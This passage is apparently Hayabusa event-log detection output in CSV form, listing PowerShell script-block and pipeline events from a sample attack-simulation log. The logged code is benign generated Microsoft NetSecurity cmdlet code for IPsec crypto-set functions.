($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): 
name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.333 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.381 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 